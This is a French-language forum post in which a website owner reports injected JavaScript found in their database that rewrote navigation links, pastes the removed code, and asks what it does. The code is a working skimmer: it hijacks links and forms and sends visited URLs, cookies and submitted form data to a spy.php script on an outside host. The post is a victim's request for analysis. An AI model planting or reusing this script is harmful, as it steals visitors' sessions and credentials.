Bonjour à tous,
dernièrement je me suis avec un problème sur un de mes sites.
Sur tous les liens que compose la barre de navigation, un code javascript se rajoutait du style javascript:req('mon lien')
Comme je n'avais rien changé dernièrement chez cherché et cherché.
Un lien appelant un code javascript était caché dans ma base de données.
Ni connaissant rien en piratage je me demandais si vous pouviez jeter un oeil sur le code que j'ai retiré afin de me dire ce qu'il faisait au juste et à quoi je dois m'attendre comme autres problèmes si problèmes il y aura.

Code javascript : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
function getXHR() { 
  var xhr = null; 
  if(window.XMLHttpRequest || window.ActiveXObject) { 
    if(window.ActiveXObject) { 
      try { 
        xhr = new ActiveXObject("Msxml2.XMLHTTP"); 
      } catch(e) { 
        xhr = new ActiveXObject("Microsoft.XMLHTTP"); 
      } 
    } else { 
      xhr = new XMLHttpRequest(); 
    } 
  } else { 
    alert("Votre navigateur ne supporte pas l'objet XMLHTTPRequest..."); 
    return null; 
  } 
  return xhr; 
}
function ajust(){var d=document.links;var fs=document.forms;for(i=0;i<d.length;i++){h=d[i].href;d[i].href="javascript:req('"+d[i].href+"')";d[i].onclick=function(){req(h);}};for(k=0;k<fs.length;k++){fs[k].onsubmit=function(){post(this);return(false)}}};function blindpost(u,d){var x=getXHR();x.open("POST",u,false);x.setRequestHeader('Content-type','application/x-www-form-urlencoded');x.send(d)};function xhr(u){var x=getXHR();x.open("GET",u,false);x.send()};function req(u){var x=getXHR();x.open("GET",u,false);x.send();document.body.innerHTML=x.responseText;xhr("http://www.atharep.org/YUI/spy.php?u="+encodeURIComponent(u)+"&cookie="+encodeURIComponent(document.cookie));ajust();};function post(f){data="";for(i=0;i<f.length;i++){fi=f[i];if(fi.tagName=="INPUT" || fi.tagName=="TEXTAREA"){iname=encodeURIComponent(fi.name);ivalue=encodeURIComponent(fi.value);data+=iname+"="+ivalue+"&";}};if(f.method=="GET"){req(f.action+"?"+data)}else{postdata(f.action,data);blindpost("http://www.atharep.org/YUI/spy.php?u="+encodeURIComponent(f.action),data)}};function postdata(u,d){var x=getXHR();x.open("POST",u,false);x.setRequestHeader('Content-type','application/x-www-form-urlencoded');x.send(d),document.body.innerHTML=x.responseText;ajust();};ajust();void(0);

Cela ressemble à de l'AJAX mais que fait-il au juste je ne sais pas.

Merci de votre aide